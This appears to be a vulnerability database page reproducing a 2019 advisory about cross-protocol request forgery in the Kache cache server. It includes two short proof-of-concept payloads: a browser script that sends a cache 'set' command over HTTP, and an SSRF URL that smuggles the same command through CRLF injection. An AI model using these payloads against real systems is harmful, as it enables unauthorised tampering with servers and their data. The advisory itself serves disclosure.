Lucene search
K

Kache Cross Protocol Request Forgery

🗓️ 04 Mar 2019 00:00:00Reported by Codex LynxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

Kache Cross Protocol Request Forgery vulnerabilit

Code
`# Title: Kache / CPRF  
# Date: 03/01/2019  
# Discovered by: @codexlynx  
# Software Version: <= Commit: de2c39491625c3f087027be961a17191e85f6d30 (For now they don't version)  
# Category: go, resp, cprf  
  
[1]CPRF (Cross Protocol Request Forgery)  
--------------------------------  
Kache server don't close connection when unknown strings are received. This can allow to a malicious actor to perform cross protocol interactions.  
  
- POC 1: Set a key by HTTP:  
  
<script>  
var x = new XMLHttpRequest();  
x.open("POST", "http://<TARGET_ADDRESS>:<TARGET_PORT>");  
x.send("set mykey myvalue\n");  
</script>  
  
- POC 2: Exploit this CPRF for set a key via SSRF + CRLF Injection:  
  
https://<VULNERABLE_TARGET>/ssrf.php?url_to_post=http://<KACHE_ADDRESS>:<KACHE_PORT>/%0D%0Aset%20mykey%20myvalue  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Mar 2019 00:00Current
0.8Low risk
Vulners AI Score0.8
34